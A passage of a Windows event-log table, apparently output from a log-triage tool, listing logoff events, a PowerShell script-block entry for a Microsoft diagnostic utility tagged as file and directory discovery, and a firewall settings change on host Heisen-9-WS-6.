&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-5-21-38715   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 82759-1638593395-315824688-500   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: None             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-513        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x725da'        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: Administrator   &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-15 21:21:09 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4647     &#9474; 1891      &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x725da'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-15 21:33:29 &#9474; &#8227; Powershell File and Directory     &#9474; 1     &#9474; Microsoft-Windows-PowerShell   &#9474; 4104     &#9474; 158       &#9474; Heisen-9-WS-6   &#9474; MessageNumber: 1                 &#9474;
&#9474;                     &#9474; Discovery                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ScriptBlockText: "# Copyright    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; &#169; 2008, Microsoft Corporation.   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474;  All rights reserved.\r\n\r\n\   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; r\n#Common utility functions\r   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; \nImport-LocalizedData -Bindin   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; gVariable localizationString -   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; FileName CL_LocalizationData\r   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; \n\r\n# Function to get user t   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; roubleshooting history\r\nfunc   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; tion Get-UserTSHistoryPath {\r   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; \n  return \"${env:localappdat   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; a}\\diagnostics\"\r\n}\r\n\r\n   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; # Function to get admin troubl   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; eshooting history\r\nfunction    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Get-AdminTSHistoryPath {\r\n     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; return \"${env:localappdata}\\   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ...                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; (use --full to show all content) &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ScriptBlockId: 7da842bc-aef6-4   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 776-a4b1-153a5ec853a1            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; MessageTotal: 1                  &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Path: C:\Windows\TEMP\SDIAG_90   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2f7246-66c4-41e3-ae3d-8e78c05b   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 5308\CL_Utility.ps1              &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-15 21:54:29 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 2238      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x11eb542'       &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-15 22:05:37 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4647     &#9474; 2268      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0xf933e'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-15 22:05:37 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 2274      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: UMFD-2           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-96-0-2      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Font Driver    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Host                             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0xe5264'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-15 22:05:39 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 2275      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: DWM-2            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-90-0-2      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Window Manag   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; er                               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0xe5fe6'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-15 22:05:39 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 2276      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: DWM-2            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-90-0-2      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Window Manag   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; er                               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0xe5da0'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-15 22:05:42 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4647     &#9474; 2278      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x5f0eb'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 16:47:55 &#9474; &#8227; Windows Firewall Settings         &#9474; 1     &#9474; Microsoft-Windows-Windows Fire &#9474; 2002     &#9474; 1307      &#9474; Heisen-9-WS-6   &#9474; ModifyingUser: S-1-5-80-308807   &#9474;
&#9474;                     &#9474; Have Been Changed                   &#9474;       &#9474; wall With Advanced Security    &#9474;          &#9474;           &#9474;                 &#9474; 3201-1464728630-1879813800-110   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 7566885-823218052                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValue: '06000000'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingType: 2                   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValueSize: 4              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValueDisplay: Private,P   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ublic                            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Origin: 1                        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ModifyingApplication: ''         &#9474;
